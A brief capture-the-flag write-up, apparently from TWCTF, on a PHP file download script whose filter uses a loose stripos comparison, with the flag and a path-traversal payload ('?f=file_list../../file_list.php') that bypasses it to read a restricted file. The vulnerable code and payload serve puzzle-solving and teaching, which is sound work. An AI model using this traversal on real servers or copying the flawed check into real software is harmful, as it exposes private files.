file download vuln
-> download.php?f=951470281beb8a490a941ac73bd10953

download.php

// TWCTF{then_can_y0u_read_file_list?}
$filename = $_GET['f'];
if(stripos($filename, 'file_list') != false) die();
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename='$filename'");
readfile("uploads/$filename");

if(stripos($filename, 'file_list') != false) die();

-> stripos("file_list", "file_list") == false (vuln)

-> stripos("file_list", "file_list") === false (not vuln)

-> ?f=file_list../../file_list.php